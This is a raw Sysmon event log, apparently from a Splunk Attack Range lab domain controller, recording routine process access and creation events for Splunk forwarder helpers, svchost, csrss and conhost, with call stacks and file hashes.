14:02:46.934{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:46.934{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.934{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:46.934{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.934{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9506-6005-5005-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.934{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9506-6005-5005-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.935{59A5CD1D-9506-6005-5005-00000000A301}6632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.059{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9506-6005-4F05-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:46.059{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.059{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:46.059{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.059{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.059{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9506-6005-4F05-00000000A301}6008C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.059{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9506-6005-4F05-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:46.060{59A5CD1D-9506-6005-4F05-00000000A301}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:47.095{59A5CD1D-9506-6005-5005-00000000A301}66325536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.856{59A5CD1D-9508-6005-5205-00000000A301}42402512C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9508-6005-5205-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:02:48.701{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9508-6005-5205-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9508-6005-5205-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.701{59A5CD1D-9508-6005-5205-00000000A301}4240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.184{59A5CD1D-9508-6005-5105-00000000A301}37966388C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.028{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9508-6005-5105-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.028{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
